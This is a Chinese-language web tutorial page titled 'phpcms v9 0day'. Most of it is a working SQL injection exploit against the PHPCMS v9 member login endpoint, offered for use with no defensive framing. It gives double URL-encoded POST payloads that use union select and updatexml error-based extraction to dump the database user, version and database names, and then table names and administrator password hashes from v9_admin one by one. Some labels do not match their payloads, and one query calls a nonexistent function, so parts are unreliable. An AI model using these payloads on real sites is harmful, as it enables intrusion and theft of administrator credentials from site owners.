您现在的位置是:首页 > cms教程 > phpcms教程phpcms教程
phpcms v9 0day
尤政航2025-05-23phpcms教程已有人查阅
导读只要url编码一下,替换一下就ok了在updatexml里必须只能有三个值所以爆帐号密码要一个一个爆
index.php?m=member&c=index&a=login
后缀
username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523
爆管理账户密码
username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523
版本:
username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523
库:
username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabases())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523
爆出表:
updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema='phpcms' limit 0,1),0x5e24),1)
只要url编码一下,替换一下就ok了在updatexml里必须只能有三个值
所以爆帐号密码要一个一个爆
如:
updatexml(1,concat(0x5e24,(select password from v9_admin limit 0,1),0x5e24),1)
以此类推备注(有一些需要验证码登陆的请添加&code=5fnuv&dosubmit=%E7%99%BB%E5%BD%95)
感谢您的认可和支持
微信
支付宝
本文标签:
很赞哦! ()
图文教程
phpcms标题,栏目,导航等调用写法
获取父分类下面的子分类结果可以用在sql 的in子句中调用根目录下phpcms\template\content\header文件{template "content","footer"}
PHPCMS中CSS文件存放位置在哪
PHPCMS中CSS文件可以放到“statics/css”文件夹里面,该文件夹中存放着PHPCMS中的所有CSS文件,也可以将其任意放在某个位置,只要CSS文件路径写入正确
phpcms切换中英文网页实现pc和手机端切换的方法
AA。phpcms进行双语切换方法(不用解析二级域名)phpcms进行两种语言的切换,有一把部分的人都是进行的二级域名的解析,这样的话可能会有一部分的麻烦
phpcmsv9模板制作常用代码
phpcms v9模板制作常用代码 (个人收藏)1.截取调用标题长度2.格式化时间3.多栏目调用&多推荐位调用4.显示栏目名称(只是名称,不带链接)
相关源码
-
(自适应响应式)html5蓝色智能水表营销型网站pbootcms模板下载PbootCMS内核开发,为智能水表企业打造的营销型网站解决方案,本模板基于PbootCMS内核开发,为智能水表及相关行业企业设计,采用HTML5+CSS3技术构建,具有响应式布局。查看源码 -
自适应响应式绿色装修公司定制家居类pbootcms网站下载(自适应手机端)响应式全屋装修定制家居类网站pbootcms模板 绿色装修公司网站源码下载PbootCMS内核开发的网站模板,该模板适用于装修定制网站、装查看源码 -
(自适应响应式)环保净化器家用电器网站免费模板针对环保设备、环境监测等领域的PbootCMS响应式模板,通过模块化设计清晰展示污水处理技术、空气净化系统等解决方案。移动端呈现环保数据可视化图表,后端统一管理确保项目案例、技术等资料多端同步。查看源码 -
(PC+WAP)绿色环保设备环保企业网站模板源码下载基于PbootCMS内核开发的响应式企业模板,为环保设备制造、环境技术服务等企业打造,通过模块化设计实现多行业快速适配。查看源码 -
(自适应)帝国cms7.5文章新闻博客整站源码( 带会员中心)本模板基于帝国CMS内核开发,为新闻资讯、个人博客及作品展示类网站设计。采用响应式布局技术,确保在手机、平板和电脑等不同设备上都能获得良好的浏览体验。查看源码 -
(自适应响应式)工业机床工程农业机械设备网站源码下载框架适用于工程机械、机床设备等工业领域。通过模块调整可快速转型为农业机械、物流设备展示系统。预留7种工业产品展示模板。查看源码
| 分享笔记 (共有 篇笔记) |
